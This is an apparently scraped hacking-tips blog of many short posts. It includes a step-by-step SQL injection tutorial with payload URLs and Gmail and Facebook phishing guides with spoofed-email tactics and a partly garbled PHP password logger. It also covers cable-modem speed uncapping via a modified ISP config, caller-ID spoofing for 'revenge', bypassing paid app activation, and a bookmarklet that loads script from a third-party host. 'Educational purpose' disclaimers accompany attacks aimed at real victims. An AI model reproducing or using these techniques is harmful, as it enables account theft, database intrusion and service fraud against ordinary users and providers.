Download Youtube videos via Operamini & UC browser :

Webtrix community brought the most surprising trick.

Now we make u able to download youtube videos from youtube itself without any external apps and websites ! ! And this process can be committd even via Operamini & UC browser !

via Operamini:

Step 1:

First bookmark the given bolded code in Operamini

javascript:d=document;s=d.createElement("script");s.src="http://mohdfauzi84.bplaced.net/get.js";d.body.appendChild(s);void(0);

we're comin back

hi visitors, webtrix community is extreamly sorry for being irregular !!! we're comin' back soon wid something new n surprising too !!! stay connected wid us !! SPONSORED BY MYSYMBLE

SQL Injection with the help of URL [Tutorial 1] :


Hey guyz this is webtrix again to help u with some interesting menu ! ! U know what is SQL injection?? Today we're to talk bout that very fat job ! !

SQL injection is an attack

in which malicious code is put into strings which are later flown to an instance of SQL Server for commiting some works ! !

But which sites are SQL vulnerable and how to find them.

Dunworry ! ! !
Webtrix is here to assist u. Let's find them out !

How to find sites on which we can perform:

While goin to get a vulnerable site to inject SQL u'll hear the words

"Dork a lot"

,
this means to google a particular term which targets finding vulnerable websites. An example of a google dork is

inurl:index.php?id=

,
entering dis string in google searchengine

would find out all sites from googlecache

with the string news.php?id= in theirURL.
Viz:

http://www.site.com/news.php?id=4

To be a SQL injection vulnerable a site has to have a parameter named

GET

in the URL.
In http://www.site.com/news.php?id=4 ,

id=4

is the

GET

parameter

as it is getting the id=4

from the

back end database.


How to check Vulnerability with dat:

Whether the site is vulnerable to SQLi or not, to test it we've to just

add an apostrophe( ‘ ) after one of the parameter in the URL.

Viz.

http://www.site.com/news.php?id=4'


If the site is vulnerable it will show

error

like:

You have an error in your SQL Syntax


Warning:

mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()

If you notice any of the mentioned errors putting ‘ after the parameter in that URL then therez possibility of the site to be vulnerable a little to SQLi attacks .

But itz not the single methode to discover whether the site is vulnerable or not,

vulnurablity can be findout if therez an error in form of

vanishing

while a part of the site is just simply disappears.

How to Find number of columns:

When u come to know that the site is vulnerable the further action is to search out the number of columns in the table which is in use. There are lot of ways to find this like

ORDER BY

or

GROUP BY

.
Here use

RDER BY

to search out the number of columns first. Start with

ORDER BY 1

.
Viz.

http://www.site.com/news.php?id=4 ORDER BY 1

-

If it doesn’t make the outcome of an error then use

ORDER BY

command. Sometimes you will get error on doing

ORDER BY 1

, if it gives error then simple move on to other site.
If it doesn’t error then always go to

ORDER BY 10000

(because a table can’t have 10000 columns in it) to see if it give error.
Viz.

http://www.site.com/news.php?id=4 ORDER BY 10000


Sometimes it doesn’t error as it should, then use

AND 1=0

before the

ORDER BY

query to make error outcome.
Viz.

http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000


After getting the error on 10000 its up to you how you find the number of columns,

begin with 100 and divide the no of columns by 2 until i get closer.

viz:
http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR

As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.

http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR

After this you can come to decision that the site has 4 columns

as it

gives error above ORDER BY 4 and doesn’t error below ORDER BY 4.

[NOTE : Comments are not necessary every time when injecting a site, though sometimes they are. Possible comments to use are:

/*
/**/
#

Next part on "SQL injection based on URL" will be publish in the nex post. Plz be patnce. :)

[NOTE:

This tutorial is only for Educational purpose. Webtrix neither gurantee any trick nor is responsible for the outcomes of any trick performed by any one. Remember SQL injection is a punishable cyber offence.

]
¤ Like us on Facebook
www.facebook.com/MyWebtrix

How to hack Gmail ! !

[NOTE : This is for Educational Purpose Only. Webtrix is neither responsible for any action taken by its readers nor gurantee any trick. Try it with your own risk. Remember, phishing is a punishable cyber offence.]

To phish Gmail, Materials required :
1. Gmail Phisher. Click Here
2. Free Webhosting Site. Click Here

If you know a little of Hacking, then it is importent for you know to know what is Phishing

and how it works.
Lets have a explanation.
First of all

What are Phish pages and what is phishing??

Phish pages are the fake pages pages that looks like actual webPages.

The only difference is the program running in the background, for example, actual Webpage sends requests to Gmail server while Phish Pages sends it to phishers' php server.

Basically, Phishing is a p/w hacking technique used wid d help of phish pages that looks like actual webpage . It is the URL in the address bar that makes difference. so Guys be cautious while entering a non familier site, tip for you all, always check the Address bar .

Now What is Smart Phishing?

Normal phishing page sends the password to hacker but it doesn't redirects the page to original website but smart phishing does. Means victim can never know what really happened and his account is got hacked :)!! He will only think that he has entered the wrong password as in secondattempt the web page is original and he will be able to login and the most fantastic thing is that the original redirected page has username already entered in it that makes it even smarter.
Now lets come to how it works??

When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.

come on readers, with the help of webtrix

Lets do it ! !

1. First of all download the Gmail Phisher.
Download

2. Extract the .rar file now you will get three files as given below:
¤. gmail.html
¤. log.txt
¤. mail.php
3. Upload all the Three files to any of the free Web hosting server. Remember, while creating the account on these servers try the username as nearer as possible to the original URL like mail.gmaile or maile.gmall etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.
*. www.yourfreehosting.net
¤. www.esmartstart.com
¤. www.110mb.com
¤. www.drivehq.com
¤. www.t35.com
4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim.

This is the most important step regarding smart phishing technique.

Most People use same password for orkut and gmail and here is the main hack lies.What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to theexisting mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.

Another technique is that you can send him a request to join a particular community in the format orkut does.

And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activityfrom your account and you need to verify your account and your account is temporarily disabled after thislogin. To unlock your account Verify your Email" and in that link put your Phish link. Now Guys you all will came to know How it works. If you want to Protect yourself its must that you should know what techniques a Hacker can use to hack your Gmail Account.
5. Now After sending phisher to victim,

once the user logs in to his Gmail account using your Phisher, his user ID and password are stored in log.txt ,

What youhave to do is just refresh your Web hosting account files.
6.

The Log.txt file will contain the passwords.


Done :)!

How to phish Facebook ? [N.B - phishing is a punishable cyber offence. Try it with your own interest.]


Now I'm goin to make a tutorial on facebook phish !
1stly,

go to"www.facebook.com/login.php" and right click on some white space on the page and press "view source code". A huge text is to appear, copy it all to notepad.
2ndly,
we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press

Edit

, then

search

. and search "action=" [without the quotes]. u should find

The big red ring that circles

the "action=" you have to change. You have to change it

to 'action="next.php" '

. after you have done that, you should change the method (small red circle on the picture) to

"get"

instead of

"post"

, or else it will not work.Save the

document as"index.PHP" (not htm!)

3rdly,
Now that we change the action to

next.php

, we should also make a

"next.php"

. open up notepad again. And write this:

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as

"next.php"

Note: for security you should rename

"passwords.txt" to something else

.
now make a text file called

"passwords.txt" or whatever you renamed the file to in the"next.php"

, leave this document blank.
4rthly,

Upload the 3 files "index.php","next.php" and"passwords.txt" (or whatever the password file is called) to a subdomain hosting site.

THEY MUST SUPPORT

.php

!
I suggest these: 110mb.com, spam.comor 007sites.com. When you made an account, you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

5thly,
now we would like to

send spoof emails :).

To do that we should first make an email account

which starts with facebook@. or something that looks alike.

Like this

FACEB0OK@hotmail.comORsOMeTHing like that.

You should either

use Gmail, Live, or hotmail or you could get a mail like this"facebook@noreply.com" soemthing like that.

but eventually that would cost. When your email is set go to step six.
6thly,

Copy the content of an original Facebook friendship invitation email and paste it into a new mail.

DONT SENT YET!

remove the hyperlink from this link

:
http:/www.facebook.com/n/?reqs.php

Mark it and push the 'Add hyperlink button'.
Add hyperlink button in the red circle.

now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page. Now i belive your ready to send your spoof emails to everybody you know.

TRY IT WITH YOUR OWN RESPONSIBILITY,
Phishing is a punishable cyber offence ! !
Webtrix isn't responsible for any action created by itz reader

Hack NetQin to become pro member :

This is a simple trick to activate NetQin or

to become pro member without using a single penny.

Here we go,
needed things
1. You should have internet activated.
2. Your sim card should have no balance.
3. Insert the sim in your phone. You

should not have any balance or it will get deducted. Then open any NetQin software to activate or to make it a pro member

and try to activate. Then it will start activating and tell that so and so charge will be taken.
Say

Yes

and then it will connect to the internet and send a message together. Then it will say message sending failed. Select

ok

. Then it will say activation is proceeding and then it will activate. Have a try.

I did it more than a 100 times on many different phones. And it always works.

Tell me if there is a problem.
¤ Download Free NetQin Mobile Guard.
¤ Download Trial Version NetQin Mobile Security.
¤ Download Free NetQin Mobile Manager

¤ Like this post on Facebook

Change Typed Text To Audio :

There is software which changes typed text to audio speech.

For itz trial version go to this Link .

You can search web for its full cracked version. By the way if ur text is in pdf format u can use adobe reader for tEXT to speech function.

Like This Post On Facebook

PDF Password Remover PDF Password Crack - Adobe PDF documents password recovery :

View PDF Password Remover product

Download PDF Password Remover

PDF Password Crack is a program to recover passwords for Adobe Acrobat PDF files. PDF Password Crack can be used to decrypt protected Adobe Acrobat PDF files, whichhave "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics (and copying them into the Clipboard), or adding/changingannotations and form fields. Decryption is being done instantly. Decrypted file can beopened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e.with edit/copy/print functions enabled. All versions of AdobeAcrobat (including 5.x, which features 128-bit encryption) are supported. You can see how our softwareperforms the process to crackPDF password – FREE Demo Version of PDF Password Crack software is a working demo of our tool. You can download this functional Demo Version online free of cost. To dowload Click Here

How to Save Web Page to PDF format

Are you one of the many internet users who are still manually copies and pastes information from the web to a Word document?

Quit wasting yor time doing such tedious task and save abunch of papers just to print what you just"Googled". You know, there's a better and easier way of doing these things. A free online HTML to PDF converter can come to your rescue. And I will show you how. There are a lot of day-to-day situations where an HTML to PDF convertion tool can come in handy. Here are some of its common uses: 1. Save a Wikipedia page for your research activity 2. Save an online tutorial page for offline reading 3. Save any web page for archive / compilation

Now How to Save Web Page to PDF format

There are a lot of free html to pdf converters available online. But among that I have tried, the one that I likebest is this: Click Here With this free online pdf converter, you can convert and save any URL / web pages into a single pdf file. What I like most about it is that it's very straight forward and very easy to use. Just copy the URL of the web page you want to save, paste it in the box, then click "Convertto PDF". It's that simple. Moreover, it doesn't put any watermarks on the converted pdf unlike other free conversion tools online. Try it now!
.

Find crack software

Download full crack software with google (Trick) : Hi friends, today i found a interesting google trick by which we can download any software orgame of its full crack version. For this do this one simple step. Just add fbr94 with the search key. i.e. If you want to download total video converter then search "totalvideo converter fbr94" and you willfind full crack software in google search.

[TRICK] Another Way ToDownload youtube videousing operamini on mobile phone : Actually i don't know who is theoriginal author of this tutorial, but here i'm just share what i found out there. This trick is using java script.. Ok let's do it... Step by step : 1. Open operamini and make (or edit) a bookmark first for easy use later. Copy and paste the javascript below in the bookmark address (without spacing) javascript:d=document;s=d.createElement("script");s.src="http://mohdfauzi84.bplaced.net/get.js";d.body.appendChild(s);void(0); 2. Go to http://www.youtube.com>> Search or browse for the video what you want 3. Scroll down to bottom page >> click " desktop " to change youtube page layoutto desktop mode After youtube page layout changes to desktop mode Zoom In... under the media player you will see some menus (like, dislike, share, etc. ), there's no download options. 4. Now... go to bookmark andclick the bookmark that you created earlier. 5. After loading is complete you will see a download option. Click "download" >> wait until loading is complete >> select what format you want to download >> 6. Downloading...... Enjoy... I'm sorry .. the screenshots above does not include a download manager, becausethe files in the screenshot is364.3MB. whereas my Memoricard only 128MB, 36MB available. And below is SS from the other files I have downloaded

How to Freely Unlock modem Without any Software : This will help you to unlock any modem freely without using any softwarer, and you can unlock it wherever you find yourself I know most people don't yet that they can unlock their modem without any Software, or some call it UNLOCKER. Below i want to share with you a simple way you can unlock any modem. How to unlock any modem without having any software You can unlock your modem (ZTE& HUAWEI) What you need to unlock your modem is IMEI Number of your modem and internet access. Goto this site: http://bb5.at/huawei.php?imei= when you are there, enter your imei No. often starts with 35, and add it to front of = sign e.g. http://bb5.at/huawei.php?imei=35123456789...and continue by pressing Enter. In a few second it will show you the imei number you have entered and unlock code! Locate entsperren/unlock and copy the code. Insert another sim aside from the manufacturer's example; if you're using glo 3g modem, insert mtn, zain or etisalat. When You plug it, it'll will request you to enter the unlock code, just enter the one you copied on entsperren/unlock and click on "ok" We are done! You can now switch any network at will. Note; you only have 10 trial to unlock your modem, if youfailed this 10 times, your modem will be locked forever? You can as well use this website to unlock both huawei and zte: http://a-zgsm.com don't forget, we are always here to give you guys vital informations! -webtrix corp.

How To Unlock Any Mobile Phone

If you forget your Security Code, there is no need to take it to a Phone Engineer, you can do it yourself, with what is know as the 'mastercodes' which is a 10 letter Number. Oh, and this works only for Nokia Phone.
Do You Forgot your Nokia phone security/lock code? and you are getting irritated and frustrated trying to guess and reset your phonesettings? You don't have to worry anymore.
With this free online tool youcan reset your security code without even using cable wires and programming.
This can be done simply by means of "Mastercode" .
How to get Mastercode
The Mastercode is a unique code to your handset as it isgenerated using your mobile 15 digit IMEI number (serial number). The IMEI number can be found on the sticker underneath the battery or simply by typing *#06# at phones standbye mode.
To generate your Master code. enter your 15 digit
serial / IMEI number at the form here Get Your MasterCODE

Here

Your master code will be generated almost instantly. You then need to enter this code into your Nokia Phone when prompted for the security code.
Nokia Phone security code only composed of 5 digit Numbers, but with Mastercode, it has 10 digits. No need to fret as this is why it is called a Master code, as long as you entered your IMEI correctly, the generated code can easily replace your actual/forgotten security code. Thereby making it possible for you to unlock a any security locked phone.
Please Note that Nokia Default Security Lock code for All Nokia Phone is 12345.

How To Open .DOC, .DOCX And PDF Files On Your Java and Symbian Phone

How To Open .DOC, .DOCX And PDF Files On Your Java and Symbian Phone

Hack modem + Isp to get lot speed : I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100,SB4100 or SB3100 cable modem Theory of cable modem working All the cable modems when itboots up it will search for an"Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up itquery TFTP server and download Image file from [TFTP] [server] according to this this our speed limits will be set. Our Mission Get this Image file from ISP`sTFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server. 1). Get cable [modems] MAC-Addreaa You can either look at the back of the modem to get this MAC Address or you canlogon to your Cable modem with your Web Browser 192.168.100.1/.This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 andSB3100) that gives you even more vital information on configuration. Unless it isturned off by your ISP. This feature might be totally turned off by your ISP. 2). Get your [ISP] TFTP server IP address a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program thatwill tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all youneed to get started. To use this BOOTP QUERY tool, you need the MACaddress of your cable modem or Beginners can use DOCSIS Diagnosis utility Code:: docsis Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your"Image file" stored in that TFTP server All your vital information is stored inthis file, One of which is the MaxRateDown 2621440; MaxRateUp393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down) Among these, the one we need are: Configuration [TFTP] [Server] = 194.*.*..90 (replace this with yours throughout in the doc) Configuration filename = isrr.bin (replace this with yours throughout in the doc) And IP fragments created = 0 IP address.10.$$$.$$$.$$$ = 10.$$$.$$$.$$$ IP address.192.168.100.1= 192.168.100.1(the IP address of the cable modem,(replace this with yours throughout in the doc) IP-to-If-index.10.$$$.$$$.$$$ = 2 Suggestion: You can do this step by sniffing the modem i.e."192.168.100.1" when modem boots up. I never tried this method. Try your luck. 3) Download Image file from ISP`s TFTP server. For doing this got to your command prompt and use below commands with out quotes and bracket. "C:\tftp -i GET " Okay now you got Image file from your ISP`s TFTP server. 4). Decrypt the Image file which you downloaded from ISP`s TFTP server For all you can use the DOCsis tool Code:: docsis to decode. 5). Modify the Image file Change your computer's TCPconfiguration same as ISP`s TFTP server (i.e. IP addresssame as ISP`s TFTP server) Go to my network place and right click ->properties Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values Configure your TPC's TCP settings as below IP: 194.*.*.90 (replace with the ISP's TFTP server) Netmask: 255.255.255.0 Gateway: 192.168.100.1(replace with your cable modem's IP address) Note: Gateway should be 192.168.100.1then only your modem can communicate with computer. 6). Encrypt the modified Image file (Save it using Docsis) 7). Host TFTP server in your computer Download TFTP Server software and host TFTP server in your computer You can download TFTP server from:Code: Code:: http://www.megaupload.com/?d=6KG6XIOO 8). Put Image file in the basedirectory of your TFTP Start TFTPD32 server. Go toSettings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. theimage file which you modified). If you need to replicate a directory pathname alongwith the image file, then make a directory from root that correspondsto the image filepathname. Restart your modem, and ASSOON asthe SEND light goessolid, you should see a receive on your TFTP server i.e. your PC 9). [Restart] your [modem] 10). Changer your PC's IP back as given by ISP 11). OOPS Done. Start surfing with your new speed. - webtrix Ad: get 20% discount on hosting by Hostgator, go to http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=mywebtrix

COOL JAVA TRICKS. Cool JavaScript Tricks and Codes Here is list of some cool java script Codes.To run these scripts you have to copy and paste these codesin your web browser and then hit enter.The java script will get executed.Javascript is a very cool language if you how to play with it.Check outsome best example of this language. 1.This script code will pulls off all the images from your web page and rotates them in a circle. The best place totest is a website with many images. (Google Images for an example).you can try it on google .com also. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName(“img”); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+”px”; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+”px”}R++}setInterval(‘A()’,5); void(0); 2.Shake the Browser.This Script will shake your browser check it out javascript:function Shw(n) {if(self.moveBy) {for (i = 35; i> 0; i–) {for (j = n; j > 0; j–){self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } }}} Shw(6) 3.Cool message trick Just type your message.. javascript: contentBodyEditable=”true”.DesginMode=”Message” 4.Play the “Lord of the Web” This code lets you edit any page/website in real-time . With Firefox, you caneven edit and save the modified pages to your computer. Very nifty code! javascript:document.body.contentEditable=’true’; document.designMode=’on’; void 0 5.The Calculator In case you are not in a mood to use the standard windows calculator and wantyour browser to do the dirtyjob for you, use this code. javascript: alert(34343+3434-222); 6.Finding Spoof Websites There are times when you are not sure that the website that you are visitingis authentic. Use this code whenever in doubt :- javascript:alert(“The actual URL is:\t\t” + location.protocol + “//” + location.hostname + “/” + “\nThe address URL is:\t\t”+ location.href + “\n” + “\nIf the server names do not match, this may be a spoof.”); try them....... - webtrix Ad: for best apps goto Adobe !

Know Balance of Your Friends Mobile 2012: With this Trick you cancheck the mobile balance of your Friendsin Airtel, Docomo, Idea and Bsnl . Just Dial below Given Number for Checking you Friends Balance : Airtel – 09810198101 Docomo – 09040012345 or 07737012345 Idea – 09824012345 Bsnl – 9415100123 (only for up) . After Dialing Select language > Already Operator user > Enter Your Friends Number . Done ! If in Airtel it will ask forPin then use 1234 as Pin Number . Note – Docomo Numberis Toll Free but in othernumbers Charges are apply as Std Call Rates . This Trick is tested many times and 100 % Working.. Enjoy !!! - webtrix corp Ad: for best apps go to Adobe ! !

Shut Down Your PC by SMS: View Video on YouTubeShutdown Pc by SMS This is my favourite secret mobile phone tricks out of the list. When you have everything set up, you’ll be able to send a text message with a chosen keyword such as “˜shutdown’ to your PC. This then activates the shutdown procedure. Here’s how it works. First, you create an easy text file with a one line command (this is specified in the video) and save it to your hard drive. Then, you set up a Kwiry account and sync it withyour Email account which you have set up in Outlook Express. A rule must then be created in Outlook Express which will detect any incoming emails with that keyword and then execute the shutdown command in the text file when it does. By sending a text with the keyword to your Kwiry account, an identical email is sent to your own email account, thus you can shut down your PC via SMS when you’re out and about. It’s best to choose an obscure word so a normal email doesn’t accidentally shut down your PC. You could also use this for cueing up a video game or a program which takes a long timeto load before you actually get home to your PC by choosing another application besides from the shutdown file when creating a rule. - webtrix corp Ad: send free sms and many more. Check www.freesms8.in Need best apps? Check Adobe

Facebook Tips/TricksYou Might Not Know 2012: If you surf Facebook on daily basis or occasionally, chances are you’re already familiar with regular stuffs like add/delete friends, update statuses, walls and profile, add and explore pages & applications, etc, but there’s more.. 1>How To Place Facebook Chat On Firefox Sidebar If you are using Firefox, you can place the Facebook Chat at the sidebar. 2>How To Download Facebook Photo Albums FacePAD: Facebook Photo Album Downloader allows you to download your friends’ facebook albums, Events albums, and Group Albums, en masse, with the click of a button. 3>How To Share Flickr Photos To Facebook Flickr2Facebook is an unofficial Flickr to Facebook uploader(bookmarklet) whichallows you upload photos to Facebook from Flickr. 4>How To Update Facebook Without Using Facebook hellotxt and Ping.fm both introduced features that let Facebook administrators update Facebook Pages. 5>How To Schedule Facebook Messages Sendible lets you schedule Facebook messages ahead of time so you can send messages to your friends, customers or colleagues in the future. 6>How To "Friend" SomeoneOn Facebook & Hide It From Your Status Updates A short tutorial on Makeuseof to guide you howto hide Facebook status updates and keep that fact confined to your closer friends. 7>How To Create A Photo Collage Using Pictures Of Your Facebook Friends Click on Friends tab. Proceed to More tab. From"Choose an option" dropdown, choose any of the dashes "—" . Your Facebook friends collage is right on your computer screen. 8>How To Know When Facebook Friends Secretly Delete Or Block You This service has been discontinued. X-Friends is aunique tool for tracking friends that disappear from Facebook. 9>How To Display Selected Pictures Only On Your Facebook Profile Page A little-known feature in Facebook that lets you decide who shows up in thatFriends box. Click that "edit"pencil in your Friends box and type the names of your best friends in the box that says "Always show these friends" 10>How To Remove Facebook Advertisements This Greasemonkey script –Facebook: Cleaner removes many of the annoying ads and updates that unavoidably appear on yourFacebook pages. 11>How To Syncs Photos Of Facebook Friends With Contacts In Microsoft Outlook OutSync is a free Windows application that syncs photos of your Facebook friends with matching contacts in Microsoft Outlook. It allows you to select which contacts are updated. So you can update all contacts at once or just afew at a time. 12>How To Display Facebook Statuses On WordPress Blog The following method make use of Facebook status feedand WordPress RSS widget to display Facebook Statuses on WordPress blog.. It will also work for self-host WordPress blogs. 13>How To Post Your Blog Posts To Your Facebook Wall Automatically Wordbook allows you to cross-post your blog posts to your Facebook Wall. YourFacebook “Boxes” tab will show your most recent blog posts. 14>How To Access FacebookChat On Desktop Gabtastik and digsby let youkeep Facebook chat sessions open on your Windows desktop outside ofyour regular web browser, using minimal screen real estate and system memory. 15>How To Create Quiz On Facebook Easily LOLapps provides quiz creator that can be employed to conjure up these popular personality quizzes that are so widespread in Facebook. - webtrix corp. Ad: For best apps go to Adobe . Need a free domain or bulk email ?? Check www.dot.tk

Hey everybody For .tk domain or .tk bulk email address for fully free of cost check www.Dot.tk - webtrix corp Ad: for best app powered by Adobe go to Adobe .

Trick to Make Fake Calls ,Caller ID Spoofing: hi everybody Here i Guide you all how to make Fake Calls/Caller ID Spoofing... Well, Have you ever thought that you can make a fake call???? Well, there is an online tool to do so known as Crazy Call to perform Caller ID Spoofing. Well,this online tool can Helpyou to call from any number to any number at affordable prices. Many websites may offer to do so but most of them are non-working and rest of them charges very high. This is 100% working and will help you to Spoof Caller ID. Well, In this trick, you can easily hide your number and call from any number of your choice without getting caught. So, Prank with your friends and amaze them or take revenge from your enemies. Caller ID Spoofing is a way to call to a recipient's number while displaying a number which is not of its actual destination without showing your identity. So, Make a fake call easily without getting caught. Note: Well,this service charges a bit high as It will be applying International Call rates.Make sure that you maintain High Balance before using this service. Trick to make Fake Calls Firstly go to this site- Crazycall Select your country. In the first field, Enter the number that you want to display.In the second field, Enter the number of the recipient.In the third column, you can even change the quality of your voice. - webtrix corp. Ad: web design, hosting, bulk email and many more. Check www.gujaratinfo.in

How to access Google docs files without internet : It is a normal thing to save notepad,word,excel or powerpoint files in Google docs.Wherever internet is available these files can be accessed by doing loginto Google docs panel. But what you do when you have no internet connection?Or your internet stopped working due to some network problems.In that case you are not able to read these files.To resolve this problem Google provides a service known as takeout. With the help of this service you can save your all Google docs files in one zip file.This can be done by just clicking on one button.After this you can save these files in whatever extension you want. A Simple process is given below by which you can do it. For this first of all go tothe link given below: 1. https://www.google.com/takeout/#custom Copy the Code After this you have to login to your Gmail account. Now choose Google docs service and than click on create archive button. In this way it will save your Google docs files in one zip file. If you want than you can save your file in popular extensions like excel,word or powerpoint or you can make pdf also. Instead of this,these files can be opened in open office service. - webtrix corp ad: check best apps at Adobe

How to configure Proxy, Port, and APN of your Mobile Phone : Since many of our members knew nothing about changing their apn (access point name), proxy or proxyserver address and port manually, this may help a little to other members, . . before we go on, let us understand this... >what is apn? _Access Point Name (APN) is a computer protocol that typically allows a user's computer to access the Internet using the mobile phone network. On a technical level it is a configurable network identifier used by a mobile device when connecting to aGSM carrier. The carrier will then examine this identifier to determine what type of network connection should be created, for example: what IP addresses should be assigned to the wireless device, what security methods should be used, and how or if, it should be connected to some private customer network. More specifically, the AccessPoint Name (APN) identifies an IP Packet Data Network (PDN), that a mobile data user wants to communicate with. >>psa or proxy server address _A proxy server provides you with a central location for an Internet connection. Hackers and webfree users (wfu) use proxy servers address to control Internet traffic. The proxy server address can block unwanted websites, control bandwidth settings and cache popular websites for faster browsing. >> ORT (NUMBER) _A port is identified for eachaddress and protocol by a 16-bit number, commonly known as the portnumber. The port number completes the destination address for a communications session. Thus, different IP addresses or protocols may use the same port number for communication. [How to configure Proxy, Port, and APN of your Mobile Phone by mistermobile] How to configure Proxy Server Address , Proxy Port Number , and Access Point Name of your Mobile Phone >> China Phone, MyPhone, and Cherry Mobile _APN: Go to MENU, SERVICES> DATA ACCOUNTS> GPRS, create NEW SETTINGS. _Proxy and Port: Go to MENU, SERVICES, WAP, SETTINGS, create NEW PROFILE. _Java Settings: Go to MENU, SERVICES, WAP, SETTINGS, choose SIM1, then ACTIVATE. Go to MENU, JAVA, JAVA SETTINGS, make sure to use DEFAULT. >>LG KP500 Cookie, GW520, and LG Renior _APN: Go to MENU, SETTINGS, CONNECTIVITY, ACCESS POINTS, ADD PROFILE. _Proxy and Port: Go to MENU, SETTINGS, CONNECTIVITY, INTERNET PROFILE, ADD PROFILE (choose the settings above), click USE PROXY, choose ON. _Browser Settings: Go to MENU, SETTINGS, BROWSER, SETTINGS, PROFILE< ADD PROFILE (choose the settings above) , SAVE, then ACTIVATE. >>LG KE970 For _APN: Go to MENU, SETTINGS, CONNECTIVITY, NETWORK, NETWORK PROFILES, DATA CONNECTIONS, OPTIONS, NEW PROFILE. _For Proxy and Port: Go to MENU, BROWSER, SETTINGS, NETWORK PROFILE, DATA CONNECTIONS, OPTIONS, NEW PROFILE, ACTIVATE. _Java Settings: Go to MENU, MY STUFF, GAMES AND APPLICATIONS, SETTINGS, JAVA ACCOUNT, CREATE NEW, SAVE. Go back to GAMES AND APPLICATIONS SETTINGS, NETWORK PROFILE (choose the settings above). - webtrix corp

